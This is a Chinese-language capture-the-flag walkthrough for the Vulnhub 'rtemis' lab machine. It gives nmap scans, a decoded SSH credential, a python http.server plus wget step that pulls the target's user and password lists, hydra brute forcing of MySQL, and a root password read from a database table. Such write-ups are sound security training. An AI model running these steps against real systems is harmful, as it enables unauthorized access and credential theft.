Vulnhub實戰-rtemis靶機?
下載地址:http://www.vulnhub.com/entry/r-temis-1,649/
描述
通過描述我們知道這個靶機有兩個flag
主機發現
通過nmap掃描發現主機
nmap -sn 192.168.33.0/24
nmap -sS -p- -v -A 192.168.33.9
我們發現靶機開放的埠如下:
80埠 | Apache httpd 2.4.38 |
---|---|
3306埠 | MySQL 5.7.32 |
7223埠 | OpenSSH 7.9p1 Debian 10+deb10u2 |
接下來我們訪問http服務看看有什麼線索!
web服務探測
- 訪問IP獲得如下頁面:
- 接下來我們目錄掃描發現
easy.txt
檔案
- 訪問
easy.txt
檔案獲得如下Brainfuck密碼:
解密工具地址:http://www.hiencode.com/brain.html
- 通過解密我們獲得一對賬號密碼:
rtemis:t@@rb@ss
嘗試主機登入
- 通過上面獲得的賬號密碼,我們嘗試通過SSH登入靶機
ssh rtemis@192.168.33.9 -p 7223
(因為我們上面發現ssh登入埠是7223埠,不是預設的22埠!)
我們發現此時使用者是普通使用者,我們肯定看不了root資料夾,我們嘗試看看home資料夾有什麼!
- 在home資料夾發現
user.txt
和pass.txt
- 通過hydra暴力破解
mysql
密碼
我嘗試使用python,發現靶機安裝有python3,所以我們可以通過python3開啟http服務,講這兩個txt檔案下載到本地
靶機: python3 -m http.server 9999
kali: wget http://192.168.33.9:9999/user.txt
wget http://192.168.33.9:9999/pass.txt
通過hydra暴力破解mysql密碼:
hydra -L /root/user.txt -P /root/pass.txt 192.168.33.9 mysql -t 10
- 登入mysql,發現root密碼
我們拿到mysql賬號和密碼之後嘗試登入mysql:
mysql -usomu -p
接著我們一步一步發現了root使用者的密碼:
show databases;
use secret;
show tables;
select * from secret;
拿到root許可權
我們拿到root的密碼之後,登入root使用者 su
然後我們查詢flag檔案:find / -name flag*
我們發現了兩個flag檔案。實驗結束!!!?